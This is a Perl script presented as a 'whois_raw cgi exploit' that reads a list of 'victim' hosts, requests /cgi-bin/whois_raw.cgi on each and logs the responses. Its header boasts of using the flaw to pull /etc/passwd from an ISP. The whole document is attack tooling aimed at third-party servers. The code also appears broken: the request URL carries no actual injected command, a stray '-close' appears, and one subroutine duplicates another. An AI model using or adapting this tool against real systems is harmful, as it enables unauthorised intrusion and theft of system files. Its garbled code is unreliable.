This is a perl script that checks for the whois_raw cgi vulnerability. Code ripped from Piffys issscan.pl.
79a982f5b7207a58334998ccd349d93b3fadbc457f773bd51bd09e4d6b8f8b1a
##########################################################################
# This is a script that checks for the cgi whois_raw vulnerabillity. #
# The idea was inspired after having pulled up an encrypted /etc/passwd #
# file on a German ISP using the /cgi-bin/whois_raw.cgi? vulnerabillity. #
# This code was ripped from iisscan by Piffy. #
##########################################################################
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @victim;
my $userresp;
print "\nNeoErudition Technologies\n";
print "Whois_raw cgi exploit\n\n";
print "\nCoded by RatDance\n";
print "Enter Y or N to continue. [Y/N]: ";
while(1) {
chomp($userresp = <STDIN>);
if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
print "Continueing...\n";
last;
} elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
print "Exiting as requested.\n";
exit;
} else {
print "Thats not a valid answer. [Y/N]: ";
}
}
print "\nWhat file contains the victim address: ";
chomp(my $victim=<STDIN>);
open(IN, $victim) || die "\nCould not open $victim: $!";
while (<IN>)
{
$victim[$a] = $_;
chomp $victim[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "whois raw exploit initiated..\n";
while ($a < $b)
{
my $url="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>exploit_whois.log");
print OUT "\n$victim[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my $url2="http://$victim[$a]/cgi-bin/whois_raw.cgi? ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>exploit_whois.log");
print OUT "\n$victim[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}